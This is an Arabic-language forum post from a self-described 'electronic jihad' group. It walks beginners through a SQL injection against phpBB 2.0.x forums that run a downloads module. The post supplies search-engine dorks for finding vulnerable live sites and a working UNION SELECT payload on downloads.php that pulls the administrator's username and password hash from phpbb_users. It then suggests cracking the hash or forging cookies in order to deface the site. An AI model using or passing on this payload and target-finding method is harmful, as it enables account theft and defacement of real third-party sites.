Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: الثغرة : فى منتديات phpbb


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
الثغرة : فى منتديات phpbb
Permalink   
 



اليوم يا مجاهدين منظمة الكوندور المصرى للجهاد الالكترونى

جايب لكم ثغرة خطيرة جداً وسهله جداً للمبتدئين فقط

ندخل فى الموضوع بدون لوك لوك

الثغرة : فى منتديات phpbb


الشروط : لابد من توفر خااااصية داون لود في المنتدى مفعلة وإلا الثغرة ملهاش لزمة

ندخل على
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
أو اى محرك بحث وهتلاقى مواقع دنماركية كتير مصابة
أبحث عن



powered by: phpbb 2.0.13

وغير رقم النسخة زى ما أنت عاوز كلو مصاب بس أوع تأخد عدوه ((12.11.10.9.8..الخ))

على سبيل المثال ناخذ الموقع دا فار للتطبيق


[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]


ضيف الكود دا بعد رابط المنتدى




كود PHP:

downloads.php?cat=-1%20UNION%20SELECT%200,user_password,username,0,0,%20%200,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=2
زى كدا مثلاً

[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]

شوف الصورة :shy:



بتلاقى الباسورد بتاع الادمن مشفر وممكن تغير رقم العضوية زى ما انت عاوز



وممكن تبحث عن هيا هياها يعنى

inurl:Forum/downloads.php


وهذا موقع للتجارب


[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]

باقى أنك تفك التشفير أو تسجلف ى المنتدى وتخدع الكوكيز
والله لولا ضيق الوقت لآ كونت كملت باقى الشرح لغاية لما ترفع أندكس



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard